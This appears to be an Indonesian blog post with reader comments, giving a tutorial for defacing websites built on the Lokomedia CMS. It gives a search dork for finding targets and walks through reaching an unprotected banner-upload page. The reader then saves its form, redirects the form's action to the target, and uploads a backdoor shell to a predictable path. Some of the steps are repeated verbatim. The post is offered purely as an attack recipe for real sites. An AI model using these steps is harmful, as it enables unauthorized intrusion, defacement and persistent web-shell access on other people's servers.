Langsung aja :p
Dork : allinurl:media.php?module=berita
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia.
- http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi sperti berikut :- http://www.target.com/admin/modul/mod_banner.php
Kemudian
klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan
diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL
+ U dan simpan di Notepad. Didalam Source tersebut ada :
./aksi.php?module=banner&act=input
./aksi.php?module=banner&act=input
Kemudian ganti dengan
http://www.target.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian
buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :
http://www.target.com/admin/foto_berita/shell.php
Udah dehh boom aje ^_^Good Luck ;)
buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :
http://www.target.com/admin/foto_berita/shell.php
Udah dehh boom aje ^_^Good Luck ;)
Mas Kok Gk Bisa Sih Malah 404 Eror Not Foud ???
BalasHapusBerarti gak vuln :))
BalasHapusya kebanyakan 404 ;-(
BalasHapus